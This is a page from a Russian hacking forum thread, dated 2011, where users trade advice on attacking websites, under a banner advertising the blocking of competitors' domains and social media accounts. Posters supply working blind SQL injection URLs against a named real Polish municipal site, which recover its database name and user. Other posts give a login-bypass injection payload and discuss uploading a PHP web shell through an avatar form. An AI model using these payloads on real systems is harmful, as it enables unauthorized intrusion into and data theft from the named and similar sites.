УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1849 из 2438

1849

Опции темы

Поиск в этой теме

Опции просмотра

#18481

04.11.2011, 17:18

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от vaddd

vaddd said:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?

http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123+--+

#18482

04.11.2011, 19:27

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от vaddd

vaddd said:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?

Тут Blind SQL

Крутить так:

Код:

Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+substring((version()),1,1)=4

4-ая версия. Печально.

Код:

Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((user()),1,1))=109

User = mup@localhost

Код:

Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((database()),1,1))=112

Database = praca

Теперь подбирай таблички так:

Код:

Code:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+exists(select+count(*)+from+praca.НАЗВАНИЕ_ТАБЛИЧКИ)

Если страничка отобразится нормально - ты подобрал =)

#18483

04.11.2011, 19:53

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Вот вам сорцы =)

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$voted[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]has_voted[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]is_active_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

            if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"results"[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$poll_ident[/COLOR][COLOR="#007700"]) {

                return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

            } elseif (![/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]) {

                return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

            } elseif ([/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$voted[/COLOR][COLOR="#007700"]) {

                return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

        if ([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT poll_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE poll_id=[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND status[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

        } else {

            return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

        }

    }

[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_active_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE (poll_id='[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]' AND status=1)"[/COLOR][COLOR="#007700"]));

        if (![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"]) {

            return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

        } elseif ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'expire'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

            return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

        }

        return ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'exp_time'[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]]) || !isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]])) {           

[/COLOR][COLOR="#0000BB"]$pollvars[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE (poll_id = '[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]));

            if (![/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]) {

                return[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

            }

[/COLOR][COLOR="#0000BB"]$question[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'question'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$VOTE[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$vote_stat[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$COMMENT[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comments'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]','width=230,height=320,toolbar=no,statusbar=no'))\">"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'send_com'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

            eval([/COLOR][COLOR="#DD0000"]"\$result_html = \""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_head"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\";"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$loop_html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_loop"[/COLOR][COLOR="#007700"]);

            if (!isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_data[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

            }

[/COLOR][COLOR="#0000BB"]$maxvote[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'maxvote'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'maxvote'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]];

            for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'option_id'[/COLOR][COLOR="#007700"]]);[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]++) {

[/COLOR][COLOR="#0000BB"]$img_width[/COLOR][COLOR="#007700"]= (int) ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'img_length'[/COLOR][COLOR="#007700"]]/[/COLOR][COLOR="#0000BB"]$maxvote[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vote_count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$vote_percent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"%.2f"[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$vote_val[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"percent"[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"%.1f"[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$vote_count[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$option_text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'option_text'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$option_votes[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$poll_color[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'color'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

                eval([/COLOR][COLOR="#DD0000"]"\$result_html .= \"[/COLOR][COLOR="#0000BB"]$loop_html[/COLOR][COLOR="#DD0000"]\";"[/COLOR][COLOR="#007700"]);

            }

[/COLOR][COLOR="#0000BB"]$total_votes[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]];

            eval([/COLOR][COLOR="#DD0000"]"\$result_html .= \""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_foot"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\";"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$result_html[/COLOR][COLOR="#007700"];

        }

        return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]];

    }

[/COLOR][/COLOR]

Собстна, учитывая что на сервере mg=ON, и версия mysql 4, то только blind sqli. on error based не прокатит.

#18484

04.11.2011, 23:49

swat_

Новичок

Регистрация: 04.11.2009

Сообщений: 4

Провел на форуме:
233049

Репутация: 0

есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт

Invalid query: select * from Users where Username='1'' AND Password=''

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1

перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((

25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка??? и это %c8%ec%ff'

#18485

05.11.2011, 00:06

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от swat_

swat_ said:
есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт
Invalid query: select * from Users where Username='1'' AND Password=''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1
перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((

например,

username = admin

password = 1' or 1=1 --

Цитата:

Сообщение от None

25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка???

urlencode

#18486

05.11.2011, 00:25

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу

Цитата:

Сообщение от None

ЪьЪЮJFIFЪЧ;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 ЪшC ЪшC Ъюdd"Ъд Ъд╣}!1AQa"q2│▒║ #B╠аRяП$3br┌ %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ┐└┘├┤┬┴┼▓⌠■∙√≈≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧� ��бцдефгхийрстужвьызАБЦДЕФ ГХИЙЯРСТУЖВЬЫЗЪд Ъд╣w!1AQaq"2│B▒� ��╠а #3RПbrя $4А%Я&'()*56789:CDEFGHIJSTUVWXYZcdefghijstu vwxyz┌┐└┘├┤┬┴┼▓⌠■∙√≈ ≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧� ��бцдефгхийрстужвьызБЦДЕФГ ХИЙРСТУЖВЬЫЗЪз?Э╙╒┼(╒┼(╒┼(╒┼(╒┼(╒ ┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒� ��(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒� �(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼ (╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼( ╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(� ��┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(� �┼(Ъы

урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?

#18487

05.11.2011, 00:31

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от SergioBlog

SergioBlog said:
На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу
урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?

ты льешь напрямую шелл или jpg с кодом php?

#18488

05.11.2011, 00:38

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Пробовал и так и так - результат один.

#18489

05.11.2011, 00:46

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Хочу попробовать вот этот способ через мета данные картинки

_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

может выйдет что

Кто может разъяснить этот способ?

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/

Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен

#18490

05.11.2011, 01:02

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от SergioBlog

SergioBlog said:
Хочу попробовать вот этот способ через мета данные картинки
_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
может выйдет что
Кто может разъяснить этот способ?
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен

бессмысленно, во-первых, изображения обрабатываются GD, которая уничтожит весь твой php-код.

во-вторых, ты сказал, что льешь php-шелл , а на выходе получаешь jpg-файл - такого быть не может, там что-то еще происходит.

Страница 1849 из 2438

1849

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход